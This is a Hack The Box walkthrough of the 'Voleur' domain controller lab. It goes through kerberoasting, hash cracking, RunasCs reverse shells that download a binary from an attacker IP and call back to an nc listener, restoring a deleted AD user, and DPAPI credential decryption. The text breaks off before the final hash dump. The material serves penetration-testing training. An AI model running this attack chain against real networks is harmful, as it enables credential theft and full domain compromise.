Hackthebox: Voleur

Overview

Voleur is a medium-difficulty machine from Hack The Box: download smb share excel file → crack it → kerberoast svc account → WinRM through svc_winrm account → ACL restore → DPAPI abuse → grab backups (ntds + SYSTEM) → dump hashes → pth to Administrator.

Reconnaissance

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-10 17:27:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2222/tcp open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 13s
| smb2-time: 
|   date: 2025-07-10T17:29:05
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1:                                                                                      
|_    Message signing enabled and required 

We can see that this is a windows domain controller from some specific ports like kerberos 88.
First think I started with an rid brute to get all the users (even protected ones):

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb dc.voleur.htb -k -d voleur.htb --rid-brute
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               498: VOLEUR\Enterprise Read-only Domain Controllers (SidTypeGroup)                                                                                          
SMB         dc.voleur.htb   445    dc               500: VOLEUR\Administrator (SidTypeUser)
SMB         dc.voleur.htb   445    dc               501: VOLEUR\Guest (SidTypeUser)
SMB         dc.voleur.htb   445    dc               502: VOLEUR\krbtgt (SidTypeUser)
SMB         dc.voleur.htb   445    dc               512: VOLEUR\Domain Admins (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               513: VOLEUR\Domain Users (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               514: VOLEUR\Domain Guests (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               515: VOLEUR\Domain Computers (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               516: VOLEUR\Domain Controllers (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               517: VOLEUR\Cert Publishers (SidTypeAlias)
SMB         dc.voleur.htb   445    dc               518: VOLEUR\Schema Admins (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               519: VOLEUR\Enterprise Admins (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               520: VOLEUR\Group Policy Creator Owners (SidTypeGroup)                                                                                                      
SMB         dc.voleur.htb   445    dc               521: VOLEUR\Read-only Domain Controllers (SidTypeGroup)                                                                                                     
SMB         dc.voleur.htb   445    dc               522: VOLEUR\Cloneable Domain Controllers (SidTypeGroup)                                                                                                     
SMB         dc.voleur.htb   445    dc               525: VOLEUR\Protected Users (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               526: VOLEUR\Key Admins (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               527: VOLEUR\Enterprise Key Admins (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               553: VOLEUR\RAS and IAS Servers (SidTypeAlias)
SMB         dc.voleur.htb   445    dc               571: VOLEUR\Allowed RODC Password Replication Group (SidTypeAlias)                                                                                          
SMB         dc.voleur.htb   445    dc               572: VOLEUR\Denied RODC Password Replication Group (SidTypeAlias)                                                                                           
SMB         dc.voleur.htb   445    dc               1000: VOLEUR\DC$ (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1101: VOLEUR\DnsAdmins (SidTypeAlias)
SMB         dc.voleur.htb   445    dc               1102: VOLEUR\DnsUpdateProxy (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               1103: VOLEUR\ryan.naylor (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1104: VOLEUR\marie.bryant (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1105: VOLEUR\lacey.miller (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1106: VOLEUR\svc_ldap (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1107: VOLEUR\svc_backup (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1108: VOLEUR\svc_iis (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1109: VOLEUR\jeremy.combs (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1112: VOLEUR\First-Line Technicians (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               1113: VOLEUR\Second-Line Technicians (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               1114: VOLEUR\Third-Line Technicians (SidTypeGroup)
SMB         dc.voleur.htb   445    dc               1601: VOLEUR\svc_winrm (SidTypeUser)
SMB         dc.voleur.htb   445    dc               1602: VOLEUR\Restore_Users (SidTypeGroup)

I then used the provided credentials to do bloodhound enumeration:

┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound-python -c All -u ryan.naylor  -p 'HollowOct31Nyt' -d voleur.htb -ns 10.10.11.76 --zip          
INFO: Found AD domain: voleur.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
INFO: Done in 02M 17S
INFO: Compressing output into 20250710132820_bloodhound.zip

Later, we used spider_plus module from netexec to download any available network share files:

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k -M spider_plus -o DOWNLOAD_FLAG=True 
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Started module spidering_plus with the following options:
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*]     STATS_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share 
SPIDER_PLUS dc.voleur.htb   445    dc               [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json".
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Shares:           8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Readable Shares:  4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Filtered Shares:  1
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total folders found:  27
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total files found:    7
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size average:    3.55 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size min:        22 B
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size max:        16.5 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File unique exts:     5 (inf, ini, pol, xlsx, csv)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Downloads successful: 7
SPIDER_PLUS dc.voleur.htb   445    dc               [+] All files processed successfully.

We can see that we have a Access_review.xslx file, lets crack its password:

┌──(kali㉿kali)-[~/…/nxc_spider_plus/dc.voleur.htb/IT/First-Line Support]
└─$ office2john Access_Review.xlsx > hash.xslx
                                                                                                        
┌──(kali㉿kali)-[~/…/nxc_spider_plus/dc.voleur.htb/IT/First-Line Support]
└─$ john  --wordlist=/usr/share/wordlists/rockyou.txt hash.xslx          
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)     
1g 0:00:00:02 DONE (2025-07-10 13:45) 0.3759g/s 294.7p/s 294.7c/s 294.7C/s football1..lolita
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We can see we have access to some user credentials.
Lets use them to perform a targeted kerberoast attack:

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'voleur.htb' --dc-host dc.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (lacey.miller)
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$a24aca83fd617c6ffc7d9884128db09a$89061fb2e1e4d276d1cc3cdea442a3879ebb1a9ea1e9d1cbe57a8c48fe66e9e056fcf5bb025cb4c4756c672f75cd6ac3d12783deb82ac3129b8b6c8ab4444ec720ee18f59c58704208d51f5add36ffea68377afc808ab6bedd1eb835c79177663167a1a6eb822fdffdf77a473bee5a6f39039abd96b3faf3a82c4a65f887763e55ab0ddfb94e9ce6a8ef21478cc9198ea41bc084e0714786e762a22f3aff699146faaae20847b49c57f9d158795581d4b7ea9ba742a407a9a048e17744b254e8d1dca50984ae3179cede1f27ce20217b66c2875b29154ac99708cd575e11269b2103283510c9dab4cbc0853383047feab8f1c6dbff521b0c50412f47cbfd97b4828b0be58912a04fc064ce16bdecfb80c986b25e06ef8a955884d918291257b62de4c56c41f61e7aa68362b557a74e03255fe1ef0bfc00865c1ba3f8fe527841c139d0882fc897e0b017cedf99a7247a466733d2ec33fc4d597642f371d66a8139e21e137f0d58ecfe01a6cb31400368b58b58b5bdeb09a8602e4cce2009aeb5cc275e2c813a928f65dd3ab1aa119ce915eb6167c62a936324b32a1cb01f46d2eccb9579a8de02543671bb57876868e9f21e9a2234f01035b12626d4da148e9fbcbff1add377d3314819924b58f4db3c3bb5f36a9205553cf782aa590e9ba9e24cd35821048210a93595beee45cbf7fafbb1374f672d82a0d9cf1c549e683fc38d52ab98df281f027bc4ed5db96165e71bfe75ee5c10e7a086fa6a029ec754aab3c75e42ec107ee056b74bfcd68a9a6f8b5aee37c240601f82bea8f0887d628a36881113eca45170bb69d730b1a374e80d0448504d23b39362f4d10f403a9e87cbae7c9c4774dfc06049e850e8a0bafd84b564e5d230773f6ba50fb8ca7d4e4cec162eeaa41b77d660085b22927cf01aa86f7fd212a4db49656a34d0c946ac01f8e6a694e136d1cb4c590fa5755780b55801b66710e2b3c95d858d7a59d4d89b81422c1b287edf03504c54ac46ed0fbd6c09c3d0e8c389dedc00c765d9a8a2624cb8e6557410e1055f898a8839f84e291cde66c699cfd3a8d680b51549f1bc93f836feec8fb3ad6d08ffb3d292ceefcd569ac3d1fb604bf38c930575fd124cc5e62f16b65da99230f48412a178e594d92b72d45844913f773259aef3951417e2bb55b1f09d7415368b86cc62d4b5eefe29957817e8655e1337c50cb5d568b50a0ff0c609d5db1c0b0f431fb3168003c91f99f02e16f11857f7193cea737baae14439fe219d486d45eb31f9a8908af641e70fd5ecfa6fe5281018bbd7f8d3ee6284e262b7e9091f3583aba49fb81f76db4fe70029255ab7b233ec96c9c389711438bb017ec7c602c8cad137f9ecb34a81a78ba336dcdaf287c20616da7e4a01eff9d69654466260a1b05d706ddf31801b612d37eaf5fdb086c5b3f93e5b3b592aff715875e0120a3a09d0aba4fc2bfa751b42d8
[VERBOSE] SPN removed successfully for (lacey.miller)
[VERBOSE] SPN added successfully for (svc_winrm)
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$9a331e767c9e6482b00a459019f0d3c4$d1bb120cef34c0a8d7c50f7823ac96284067fd49bcea95ceb4f44eb4dc0e90d31ea112fa6f60087d4a37277f48b796c637f90f8f3cc2b0d86d108472773a1fe328a389dedb2a91257829fb682e0a328ebaac4d3e6ab4506f8e0e5a95fa164d371742a7fc6d316d22b5e304f13a7463df6e771a66fd377a6169b00cd4e65f0095ec2b0b459693d2e82967652176103d9716592267241316bbda691c7f9e92c4f54430b4fb9665e534d383d6ffa186622869383559395fb655065c6b0b8999e91d95f01cccaa1c65ac9117c28bbf1402f14e65adc015620ef76b5069967c77d8c9370d8ac316c16fe0d93ce0b862249d43f91a339a9a5f690424316c4e7c7adfc4695a4e1d36b6cf7ac993ba1f33baff59cb9f0a2800b2bed43d2c4c9ed32f89ecb051b16d999ef02bd30750066a2a3b91b1a9b206c72fb630dedf84bdb2bdae7c4b3b06d655208617c211ee6c3a279d2e94bfd9bb2df219394ef163957f86e03edf7f1df5ea2c33a357907c8ff6332c34566512e26c70a7a32cbb9424892056ad3ffbfd7129e69f8878f49d36191f8123cf71009f71fedfadfe9760183824046fa6c952aaf97571f8b9ff1683fb4a41d9020b5f90e28991641e776756f8de2bd1d5901382dc042097d411b3ab9dadfa7e8b7b2b646f91869b8616ab088ed2fe8522e7ed490c287be4576a8ae2525f2218b37b2f64c258628c884f32220e4659e4ab58ea79b5072e01f49aaec535382728dc69e688acb25adbe44bba40218e325d7b7fdd22904a0ec6d1d967fba92c83bc273032931c3937f870ca6ffb3e30d8a674a712d8f8c5eb2e8292474eb424136091590fe8bb1fec45862fcc0cc975b4be580df384df54913cfcc88b0d4dc3e158f68cd3641a2f338e69d86e70c86e8138dfcac86eea44494e9527df3e88f54216c0cf7e080ada504bf28105d4b73c72ac745ae720be32eef6672e5c4077c4d97325405d0d65d2697e0156c82b38e1d517046f6d23e74122be4be67c5232b89795c2937a7aaec260aa8f89f36e0a9f50a84300f05169c22356a78ac995c4c8b8ca4232e74a1787c011272c60f5aaf94d6e33f965d766fe8a258315a647a0b93f8446eb04ca06beffdea80817345cfb81334aac9f2a447932456d9d2bf3533c81ad9d9cd94f9cd653afe4215750aa0b7f23f3c0a4ab93166ace6ad2a719e39a3be1c81b92950d9e1d500e4b7dbbc9819ee7e54f2465b5d1103ea7184a9c7b6ff8fadd5876d798ea16a140f2064e1b8befdf6f364dfa67c5ccf1740b039694661b87655f051ae9d6facc5fc796acdde9591c9c8cd07f908253bffd171137f02a7e402d914846198765f2051472801caf08c53dc6523ea113133fa6bb0662ccc595ebf47b1e3aa39049ba8acc5791e5cd6d1e5158ad4eaff1201714b2cd1a8304c1c58e810c353103ee3e28b8445470732e42265075f98cd805fb736da2a0f1d6ef0709ff7b
[VERBOSE] SPN removed successfully for (svc_winrm)

We indeed have a few hashes to crack:

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ echo '$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$9a331e767c9e6482b00a459019f0d3c4$d1bb120cef34c0a8d7c50f7823ac96284067fd49bcea95ceb4f44eb4dc0e90d31ea112fa6f60087d4a37277f48b796c637f90f8f3cc2b0d86d108472773a1fe328a389dedb2a91257829fb682e0a328ebaac4d3e6ab4506f8e0e5a95fa164d371742a7fc6d316d22b5e304f13a7463df6e771a66fd377a6169b00cd4e65f0095ec2b0b459693d2e82967652176103d9716592267241316bbda691c7f9e92c4f54430b4fb9665e534d383d6ffa186622869383559395fb655065c6b0b8999e91d95f01cccaa1c65ac9117c28bbf1402f14e65adc015620ef76b5069967c77d8c9370d8ac316c16fe0d93ce0b862249d43f91a339a9a5f690424316c4e7c7adfc4695a4e1d36b6cf7ac993ba1f33baff59cb9f0a2800b2bed43d2c4c9ed32f89ecb051b16d999ef02bd30750066a2a3b91b1a9b206c72fb630dedf84bdb2bdae7c4b3b06d655208617c211ee6c3a279d2e94bfd9bb2df219394ef163957f86e03edf7f1df5ea2c33a357907c8ff6332c34566512e26c70a7a32cbb9424892056ad3ffbfd7129e69f8878f49d36191f8123cf71009f71fedfadfe9760183824046fa6c952aaf97571f8b9ff1683fb4a41d9020b5f90e28991641e776756f8de2bd1d5901382dc042097d411b3ab9dadfa7e8b7b2b646f91869b8616ab088ed2fe8522e7ed490c287be4576a8ae2525f2218b37b2f64c258628c884f32220e4659e4ab58ea79b5072e01f49aaec535382728dc69e688acb25adbe44bba40218e325d7b7fdd22904a0ec6d1d967fba92c83bc273032931c3937f870ca6ffb3e30d8a674a712d8f8c5eb2e8292474eb424136091590fe8bb1fec45862fcc0cc975b4be580df384df54913cfcc88b0d4dc3e158f68cd3641a2f338e69d86e70c86e8138dfcac86eea44494e9527df3e88f54216c0cf7e080ada504bf28105d4b73c72ac745ae720be32eef6672e5c4077c4d97325405d0d65d2697e0156c82b38e1d517046f6d23e74122be4be67c5232b89795c2937a7aaec260aa8f89f36e0a9f50a84300f05169c22356a78ac995c4c8b8ca4232e74a1787c011272c60f5aaf94d6e33f965d766fe8a258315a647a0b93f8446eb04ca06beffdea80817345cfb81334aac9f2a447932456d9d2bf3533c81ad9d9cd94f9cd653afe4215750aa0b7f23f3c0a4ab93166ace6ad2a719e39a3be1c81b92950d9e1d500e4b7dbbc9819ee7e54f2465b5d1103ea7184a9c7b6ff8fadd5876d798ea16a140f2064e1b8befdf6f364dfa67c5ccf1740b039694661b87655f051ae9d6facc5fc796acdde9591c9c8cd07f908253bffd171137f02a7e402d914846198765f2051472801caf08c53dc6523ea113133fa6bb0662ccc595ebf47b1e3aa39049ba8acc5791e5cd6d1e5158ad4eaff1201714b2cd1a8304c1c58e810c353103ee3e28b8445470732e42265075f98cd805fb736da2a0f1d6ef0709ff7b' > winrm.hash
                                                                                                        
┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ john  --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt winrm.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFireInsidedeOzarctica980219afi (?)     
1g 0:00:00:03 DONE (2025-07-10 13:53) 0.2915g/s 3344Kp/s 3344Kc/s 3344KC/s AHANACK6978012..AFITA4162
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We will now connect using this winrm service account user and claim user flag:

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ getTGT.py voleur.htb/'svc_winrm':'AFireInsidedeOzarctica980219afi' -dc-ip dc.voleur.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_winrm.ccache
                                                                                                        
┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ export KRB5CCNAME=svc_winrm.ccache 
┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                         
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                           
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc_winrm\desktop> cat user.txt
f28cf8c8fc8f586ddbda4eb728467e34

Privilege Escalation - ACL abuse

we can see from bloodhound capture that svc_ldap user is a member of RESTORE_USER group which has genericAll on lacy user:

Lets first switch to svc_ldap user using RunasCs since we have his credentials:

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> iwr 10.10.16.11/RunasCs.exe -outfile r.exe;./r.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.16.11:4444
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1e701f$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5320 created in background.

┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.76] 59234
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\svc_ldap
PS C:\Windows\system32>

First we can check the deleted users where we will find todd. Let’s restore him:

PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects


Deleted           : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name              : Deleted Objects
ObjectClass       : container
ObjectGUID        : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8

Deleted           : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Name              : Todd Wolfe
                    DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass       : user
ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db



PS C:\Windows\system32> Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
PS C:\Windows\system32>

We can then also connect as todd:

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> ./r.exe Todd.Wolfe NightT1meP1dg3on14 powershell.exe -r 10.10.16.11:
[*] Warning: The logon for user 'Todd.Wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1e701f$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4980 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> 

┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.76] 59252
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\todd.wolfe
PS C:\Windows\system32> 

Dpapi Abuse

We can then download todd’s masterkey and credentials to dump dpapi:

PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials> ls
ls

    Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         1/29/2025   4:55 AM            398 772275FAD58525253490A9B0039791D3                                     

PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials> cd ../protect;get-childitem -force
cd ../protect;get-childitem -force

    Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-         1/29/2025   7:13 AM                S-1-5-21-3927696377-1337352550-2781715495-1110                       
-a-hs-         1/29/2025   4:53 AM             24 CREDHIST                                                             
-a-hs-         1/29/2025   4:53 AM             76 SYNCHIST                                                             

PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect>

PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect\S-1-5-21-3927696377-1337352550-2781715495-1110> cp "08949382-134f-4c63-b93c-ce52efc0aa88" c:/temp
cp "08949382-134f-4c63-b93c-ce52efc0aa88" c:/temp
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\protect\S-1-5-21-3927696377-1337352550-2781715495-1110> cd ../../credentials
cd ../../credentials
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials> cp "772275FAD58525253490A9B0039791D3" c:/temp
cp "772275FAD58525253490A9B0039791D3" c:/temp
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\credentials> 

*Evil-WinRM* PS C:\temp> download 772275FAD58525253490A9B0039791D3
                                        
Info: Downloading C:\temp\772275FAD58525253490A9B0039791D3 to 772275FAD58525253490A9B0039791D3
                                        
Info: Download successful!

*Evil-WinRM* PS C:\temp> download 08949382-134f-4c63-b93c-ce52efc0aa88
                                        
Info: Downloading C:\temp\08949382-134f-4c63-b93c-ce52efc0aa88 to 08949382-134f-4c63-b93c-ce52efc0aa88
                                        
Info: Download successful!

┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password 'NightT1meP1dg3on14' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
                                                                                                        
┌──(kali㉿kali)-[~/targetedKerberoast]
└─$ impacket-dpapi credential -f 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

Next we are jeremy also:

┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.76] 49166
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\jeremy.combs

On jeremy we will find a note meant for third-line support:

PS C:\it\third-line support> ls
ls


    Directory: C:\it\third-line support


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         1/30/2025   8:11 AM                Backups                                                              
-a----         1/30/2025   8:10 AM           2602 id_rsa                                                               
-a----         1/30/2025   8:07 AM            186 Note.txt.txt                                                         
PS C:\it\third-line support> cat Note.txt.txt
cat Note.txt.txt
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin

We can then download the backup containing SYSTEM and ntds to our machine and dump the hashes:

┌──(kali㉿kali)-[~/targetedKerberoast]
